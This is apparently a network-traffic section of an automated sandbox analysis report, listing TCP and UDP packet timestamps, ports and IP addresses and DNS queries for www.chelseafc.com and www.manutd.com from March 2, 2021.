                                                                                                                                                                                            Mar 2, 2021 20:35:55.523957968 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.525142908 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.525171041 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.525264025 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.537695885 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.537734032 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.537849903 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.538202047 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.538250923 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.538273096 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.539402008 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.539433002 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.539524078 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.540599108 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.542128086 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.542150974 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.542169094 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.542181015 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.542408943 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.543026924 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.543050051 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.543126106 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.544251919 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.544279099 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.544369936 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.545459032 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.545483112 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.545567989 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.546672106 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.546695948 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.546756983 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.547857046 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.547945023 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.550595999 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.550621033 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.550688982 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.551167011 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.551187992 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.551256895 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.552370071 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.552397966 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.552525043 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.553580046 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.553601980 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.553706884 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.555955887 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.555984974 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.556078911 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.556510925 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.556539059 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.556615114 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.558080912 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.558109045 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.558207989 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.558804989 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.558830976 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.558892012 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.560051918 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.560070992 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.560178995 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.561197042 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.561217070 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.561306953 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.562443972 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.562474012 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.562566042 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.563694000 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.563719988 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.563791037 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.564049959 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.574604034 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.574651003 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.574763060 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.574898958 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.574918985 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.574954033 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.575759888 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.575783968 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.575858116 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.579333067 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.579386950 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.579813004 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.579838037 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.579930067 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.581003904 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.581037998 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.581101894 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.583636999 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.583662033 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.583760977 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.583945990 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.583971024 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.584043026 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.584651947 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.584670067 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.584743023 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.585918903 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.585937023 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.586030960 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.587094069 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.587115049 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.587209940 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.588207960 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.588227034 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.588298082 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.592158079 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.592175961 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.592319965 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.592675924 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.592695951 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.592782021 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.593957901 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.593983889 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.594042063 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.594269991 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.595190048 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.595223904 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.595264912 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.597568989 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.597593069 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.597626925 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.597701073 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.597768068 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.599684000 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.599706888 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.599735975 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.599796057 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.600305080 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.600331068 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.600361109 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.600393057 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.600418091 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.602730036 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.602757931 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.602791071 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.602844954 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.604024887 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.604058027 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.604088068 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.604093075 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.604146957 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616301060 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616353989 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616400003 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616436005 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616677999 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616724968 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616769075 CET4434972299.86.159.103192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616775990 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:35:55.616823912 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:36:08.263834000 CET4972080192.168.2.5172.67.179.188
                                                                                                                                                                                            Mar 2, 2021 20:36:08.264131069 CET49722443192.168.2.599.86.159.103
                                                                                                                                                                                            Mar 2, 2021 20:36:08.264405966 CET4972180192.168.2.599.86.159.34

                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Mar 2, 2021 20:35:39.290447950 CET5378453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:39.328062057 CET6530753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:39.336724997 CET53537848.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:39.385051012 CET53653078.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:39.391047955 CET6434453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:39.439136982 CET53643448.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:39.439215899 CET6206053192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:39.484987974 CET53620608.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:40.345252037 CET6180553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:40.385122061 CET5479553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:40.392447948 CET53618058.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:40.432615995 CET53547958.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:40.477181911 CET4955753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:40.523092985 CET53495578.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:41.255333900 CET6173353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:41.301048994 CET53617338.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:42.497086048 CET6544753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:42.544770956 CET53654478.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:42.930372953 CET5244153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:42.981036901 CET53524418.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:43.701423883 CET6217653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:43.748575926 CET53621768.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:48.598537922 CET5959653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:48.644828081 CET53595968.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.298403978 CET6529653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:49.345875978 CET53652968.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.354224920 CET6318353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:49.405198097 CET53631838.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.511457920 CET6015153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:49.576670885 CET53601518.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.585987091 CET5696953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:49.641621113 CET53569698.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.757347107 CET5516153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:49.805087090 CET53551618.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.811938047 CET5475753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:49.861460924 CET53547578.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:49.958964109 CET4999253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:50.016735077 CET53499928.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:50.023246050 CET6007553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:50.077478886 CET53600758.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.060678959 CET5501653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.115252972 CET53550168.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.121392012 CET6434553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.170370102 CET53643458.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.271282911 CET5712853192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.325862885 CET53571288.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.332206964 CET5479153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.391866922 CET53547918.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:53.495837927 CET5046353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:53.555145979 CET53504638.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.484817982 CET5039453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.536602020 CET53503948.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.547835112 CET5853053192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.599256039 CET53585308.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.710885048 CET5381353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.769732952 CET53538138.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:54.778197050 CET6373253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:54.851455927 CET53637328.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.625775099 CET5734453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.675307989 CET53573448.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.683742046 CET5445053192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.737142086 CET53544508.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.829713106 CET5926153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.877684116 CET53592618.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:35:55.885040998 CET5715153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:35:55.946156979 CET53571518.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:06.245893002 CET5941353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:06.305536985 CET53594138.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:06.423084021 CET6051653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:06.471906900 CET53605168.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:07.224349022 CET5164953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:07.271500111 CET53516498.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:08.014620066 CET6508653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:08.238080978 CET53650868.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:08.285960913 CET5643253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:08.509561062 CET53564328.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:08.618464947 CET5292953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:08.664447069 CET53529298.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:09.482502937 CET6431753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:09.531301975 CET53643178.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:10.321309090 CET6100453192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:10.371257067 CET53610048.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:11.598726034 CET5689553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:11.644815922 CET53568958.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:13.242064953 CET6237253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:13.287822008 CET53623728.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:18.326112032 CET6151553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:18.371889114 CET53615158.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:34.574122906 CET5667553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:34.600075006 CET5717253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:34.622932911 CET53566758.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:34.655514956 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:34.727310896 CET5526753192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:34.796859980 CET53552678.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:37.277806997 CET5096953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:37.323671103 CET53509698.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:36:43.914499998 CET6436253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:36:43.964209080 CET53643628.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:01.401587009 CET5476653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:01.449928999 CET53547668.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:02.140243053 CET6144653192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:02.195110083 CET53614468.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:02.602850914 CET5751553192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:02.665508032 CET53575158.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:03.110765934 CET5819953192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:03.177506924 CET53581998.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:03.220036983 CET6522153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:03.292376995 CET53652218.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:03.700484991 CET6157353192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:03.756330967 CET53615738.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:04.304059029 CET5656253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:04.358741999 CET53565628.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:05.279326916 CET5359153192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:05.329169035 CET53535918.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:06.011288881 CET5968853192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:06.069101095 CET53596888.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:06.909313917 CET5603253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:06.972743988 CET53560328.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:07.567197084 CET6115053192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:07.623457909 CET53611508.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:23.164566994 CET6345853192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:23.215599060 CET53634588.8.8.8192.168.2.5
                                                                                                                                                                                            Mar 2, 2021 20:37:24.581901073 CET5042253192.168.2.58.8.8.8
                                                                                                                                                                                            Mar 2, 2021 20:37:24.647057056 CET53504228.8.8.8192.168.2.5

                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                            Mar 2, 2021 20:35:49.298403978 CET192.168.2.58.8.8.80x3eefStandard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.354224920 CET192.168.2.58.8.8.80xa36aStandard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.511457920 CET192.168.2.58.8.8.80xabc8Standard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.585987091 CET192.168.2.58.8.8.80xf8e7Standard query (0)www.chelseafc.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.757347107 CET192.168.2.58.8.8.80xb205Standard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.811938047 CET192.168.2.58.8.8.80x8a83Standard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:49.958964109 CET192.168.2.58.8.8.80x90b8Standard query (0)www.manutd.comA (IP address)IN (0x0001)
                                                                                                                                                                                            Mar 2, 2021 20:35:50.023246050 CET192.168.2.58.8.8.80x8691Standard query (0)www.manutd.comA (IP address)IN (0x0001)
